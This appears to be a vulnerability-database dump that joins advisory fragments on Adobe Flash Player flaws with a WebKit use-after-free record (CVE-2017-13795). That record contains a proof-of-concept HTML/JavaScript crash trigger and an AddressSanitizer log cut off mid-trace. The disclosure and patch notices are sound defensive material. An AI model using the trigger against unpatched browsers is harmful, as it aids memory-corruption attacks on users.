https://access.redhat.com/security/cve/CVE-2021-45115 https://access.redhat.com/security/cve/CVE-2021-45116 https://access.redhat.com/security/cve/CVE-2021-45452 https://access.redhat.com/security/cve/CVE-2022-22818 https://access.redhat.com/security/cve/CVE-2022-23633 https://access.redhat.com/security/cve/CVE-2022-23634 https://access.redhat.com/security/cve/CVE-2022-23833 https://access.redhat.com/security/cve/CVE-2022-23837 https://access.redhat.com/security/cve/CVE-2022-28346 https://access.redhat.com/security/cve/CVE-2022-28347 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_satellite/6.11/html/release_notes 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYsSEj9zjgjWX9erEAQj1NhAAh9dwyCl+/LFkekteujgg+I646SZTWNua 7x7JKiF+ptoaQB3ZcbKHAwuLMK5LNzTnsq+Y+ZuhPh1EkDKlZ1LkiONw/kTgMHLB EEq+lqiI3Lr31NWValfQiIatXbLQIyD7ZCk9dxxkJtTGGJw+CL7W4f2naYAsei+4 iYghK8DG5C33U5K/1NpXetfQMpRihferXV15Cx/bxGMcRP+ryD9vxxq4PDMWa1UH zTco1EAzP3UZxpD/AqCwNmBoG4r8gxSJml6CJatiicUQ1SrTdSMj2x8jYJ8pCWXR 2ceGJVse2rBC0cunqV3tX/NL9xu8L8Vq4lyYDzJNhoSElQ6Lb/lpu1HpQpoqqmAf UBA7f80opj1o80U/M/WTQaQ9dYFDua7WlzzeuP026Pohsy/M1lZicmXMCDGJZaT1 E4ivToILRGYfhZcVBrhFgWiPUQRmFvhxpGY0cStlmpMAruGeE9saXr1LyAbQrlty fnm4z+pRiLowgJPPTmusYPicL0p1DwU9XMxDSTW11/zp9PK5dErL+mIYofbvrOpk MhTKGBJ7yOgrmKTBUNIyNupeLuFM5MUBcw+nnTyjUHPh1Vaygq//WbUD+2IZileV 0tRbFgVrt8mCk031+OVCbsUyGPO/D9+ambl7xieynjuIOHyLC+H3PH9QghCzZAUS aMoVmOr2Umo=+ioi -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce
var-201302-0303 Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0642, CVE-2013-0645, CVE-2013-1365, CVE-2013-1366, CVE-2013-1368, CVE-2013-1369, CVE-2013-1370, CVE-2013-1372, and CVE-2013-1373. Adobe Flash Player Contains a buffer overflow vulnerability. This vulnerability CVE-2013-0642 , CVE-2013-0645 , CVE-2013-1365 , CVE-2013-1366 , CVE-2013-1368 , CVE-2013-1369 , CVE-2013-1370 , CVE-2013-1372 ,and CVE-2013-1373 Is a different vulnerability.An attacker could execute arbitrary code. Note: This issue was previously covered in BID 57907 (Adobe Flash Player and AIR APSB13-05 Multiple Security Vulnerabilities), but has been given its own record to better document it. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2013:0254-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0254.html Issue date: 2013-02-13 CVE Names: CVE-2013-0637 CVE-2013-0638 CVE-2013-0639 CVE-2013-0642 CVE-2013-0644 CVE-2013-0645 CVE-2013-0647 CVE-2013-0649 CVE-2013-1365 CVE-2013-1366 CVE-2013-1367 CVE-2013-1368 CVE-2013-1369 CVE-2013-1370 CVE-2013-1372 CVE-2013-1373 CVE-2013-1374 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes several security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security bulletin APSB13-05, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the malicious SWF content. (CVE-2013-0638, CVE-2013-0639, CVE-2013-0642, CVE-2013-0644, CVE-2013-0645, CVE-2013-0647, CVE-2013-0649, CVE-2013-1365, CVE-2013-1366, CVE-2013-1367, CVE-2013-1368, CVE-2013-1369, CVE-2013-1370, CVE-2013-1372, CVE-2013-1373, CVE-2013-1374) A flaw in flash-plugin could allow an attacker to obtain sensitive information if a victim were tricked into visiting a specially-crafted web page. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 910570 - flash-plugin: multiple code execution flaws (APSB13-05) 910571 - CVE-2013-0637 flash-plugin: information disclosure flaw (APSB13-05) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.270-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.270-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.270-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.270-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.270-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.270-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.270-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.270-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.270-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.270-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-0637.html https://www.redhat.com/security/data/cve/CVE-2013-0638.html https://www.redhat.com/security/data/cve/CVE-2013-0639.html https://www.redhat.com/security/data/cve/CVE-2013-0642.html https://www.redhat.com/security/data/cve/CVE-2013-0644.html https://www.redhat.com/security/data/cve/CVE-2013-0645.html https://www.redhat.com/security/data/cve/CVE-2013-0647.html https://www.redhat.com/security/data/cve/CVE-2013-0649.html https://www.redhat.com/security/data/cve/CVE-2013-1365.html https://www.redhat.com/security/data/cve/CVE-2013-1366.html https://www.redhat.com/security/data/cve/CVE-2013-1367.html https://www.redhat.com/security/data/cve/CVE-2013-1368.html https://www.redhat.com/security/data/cve/CVE-2013-1369.html https://www.redhat.com/security/data/cve/CVE-2013-1370.html https://www.redhat.com/security/data/cve/CVE-2013-1372.html https://www.redhat.com/security/data/cve/CVE-2013-1373.html https://www.redhat.com/security/data/cve/CVE-2013-1374.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb13-05.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFRG2NzXlSAg2UNWIIRAjGKAJ4lnleOpb7dBn8s/DCk7wAK9qbQJACgm3Vs pnyD10c/hdKGIm0b1Kjv3eY= =+cgh -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . SOLUTION: Update to version 24.0.1312.70. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open specially crafted SWF content, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass access restrictions. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.310" References ========== [ 1 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 2 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 3 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 4 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 5 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 6 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 7 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 8 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 9 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 10 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 11 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 12 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 13 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 14 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 15 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 16 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 17 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 18 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 19 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 20 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 21 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 22 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 23 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 24 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 25 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 26 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 27 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 28 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 29 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 30 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 31 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 32 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 33 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 34 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 35 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 36 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 37 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 38 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 39 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 40 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 41 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 42 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 43 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 44 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 45 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 46 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 47 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 48 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 49 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 50 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 51 ] CVE-2012-5274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5274 [ 52 ] CVE-2012-5275 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5275 [ 53 ] CVE-2012-5276 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5276 [ 54 ] CVE-2012-5277 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5277 [ 55 ] CVE-2012-5278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5278 [ 56 ] CVE-2012-5279 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5279 [ 57 ] CVE-2012-5280 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5280 [ 58 ] CVE-2012-5676 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5676 [ 59 ] CVE-2012-5677 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5677 [ 60 ] CVE-2012-5678 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5678 [ 61 ] CVE-2013-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0504 [ 62 ] CVE-2013-0630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0630 [ 63 ] CVE-2013-0633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0633 [ 64 ] CVE-2013-0634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0634 [ 65 ] CVE-2013-0637 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0637 [ 66 ] CVE-2013-0638 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0638 [ 67 ] CVE-2013-0639 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0639 [ 68 ] CVE-2013-0642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0642 [ 69 ] CVE-2013-0643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0643 [ 70 ] CVE-2013-0644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0644 [ 71 ] CVE-2013-0645 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0645 [ 72 ] CVE-2013-0646 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0646 [ 73 ] CVE-2013-0647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0647 [ 74 ] CVE-2013-0648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0648 [ 75 ] CVE-2013-0649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0649 [ 76 ] CVE-2013-0650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0650 [ 77 ] CVE-2013-1365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1365 [ 78 ] CVE-2013-1366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1366 [ 79 ] CVE-2013-1367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1367 [ 80 ] CVE-2013-1368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1368 [ 81 ] CVE-2013-1369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1369 [ 82 ] CVE-2013-1370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1370 [ 83 ] CVE-2013-1371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1371 [ 84 ] CVE-2013-1372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1372 [ 85 ] CVE-2013-1373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1373 [ 86 ] CVE-2013-1374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1374 [ 87 ] CVE-2013-1375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1375 [ 88 ] CVE-2013-1378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1378 [ 89 ] CVE-2013-1379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1379 [ 90 ] CVE-2013-1380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1380 [ 91 ] CVE-2013-2555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2555 [ 92 ] CVE-2013-2728 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2728 [ 93 ] CVE-2013-3343 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3343 [ 94 ] CVE-2013-3344 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3344 [ 95 ] CVE-2013-3345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3345 [ 96 ] CVE-2013-3347 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3347 [ 97 ] CVE-2013-3361 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3361 [ 98 ] CVE-2013-3362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3362 [ 99 ] CVE-2013-3363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3363 [ 100 ] CVE-2013-5324 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5324 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201309-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Please send email to <cert@cert.org> with "TA13-043A Feedback VU#689711" in the subject. ____________________________________________________________________ Produced by US-CERT, a government organization. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Adobe Flash Player / AIR Multiple Vulnerabilities SECUNIA ADVISORY ID: SA52166 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52166/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52166 RELEASE DATE: 2013-02-12 DISCUSS ADVISORY: http://secunia.com/advisories/52166/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/52166/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=52166 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Flash Player and AIR, which can be exploited by malicious people to disclose certain sensitive information and compromise a user's system. 1) Some unspecified errors can be exploited to cause buffer overflows. 2) Some use-after-free errors can be exploited to dereference already freed memory. 4) An unspecified error can be exploited to corrupt memory. 5) An unspecified error can be exploited to corrupt memory. 6) An unspecified error can be exploited to disclose certain sensitive information. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: 1, 2, 5) The vendor credits Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna, Google 3) The vendor credits Natalie Silvanovich, BlackBerry Security, Research in Motion 4) The vendor credits Damian Put via iDefense 6) Reported by the vendor. ORIGINAL ADVISORY: Adobe (APSB13-05): http://www.adobe.com/support/security/bulletins/apsb13-05.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
var-201711-0447 An issue was discovered in certain Apple products. iOS before 11.1 is affected. Safari before 11.0.1 is affected. iCloud before 7.1 on Windows is affected. iTunes before 12.7.1 on Windows is affected. tvOS before 11.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. WebKit: use-after-free in WebCore::AXObjectCache::performDeferredCacheUpdate CVE-2017-13795 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default. PoC: ================================================================= <style> #colgrp { display: table-footer-group; } .class1 { text-transform: capitalize; display: -webkit-box; } </style> <script> function go() { textarea.setSelectionRange(30,1); option.defaultSelected = true; col.setAttribute("aria-labeledby", "link"); } </script> <body onload=go()> <link id="link"> <table> <colgroup id="colgrp"> <col id="col" tabindex="1"></col> <thead class="class1"> <th class="class1"> <textarea id="textarea" readonly="readonly"></textarea> <option id="option"></option> ================================================================= ASan log: ================================================================= ==30369==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000346940 at pc 0x000113012178 bp 0x7fff563cac80 sp 0x7fff563cac78 READ of size 8 at 0x603000346940 thread T0 ==30369==WARNING: invalid path to external symbolizer! ==30369==WARNING: Failed to use and restart external symbolizer! #0 0x113012177 in WTF::ListHashSetConstIterator<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) #1 0x112ff326d in WTF::ListHashSetIterator<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d426d) #2 0x113007cf2 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cf2) #3 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) #4 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) #5 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) #6 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) #7 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) #8 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) #9 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) #10 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) #11 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) #12 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) #13 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) #14 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) #15 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) #16 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) #17 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) #18 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) #19 0x10983356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) #20 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) 0x603000346940 is located 16 bytes inside of 24-byte region [0x603000346930,0x603000346948) freed by thread T0 here: #0 0x10ca9c294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) #1 0x11ffee650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) #2 0x11300fccb in WTF::ListHashSet<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::deleteAllNodes() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f0ccb) #3 0x113007edd in WTF::ListHashSet<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::clear() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8edd) #4 0x113007d30 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8d30) #5 0x1139a3d4a in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb84d4a) #6 0x1135afb10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10) #7 0x1135b6542 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x797542) #8 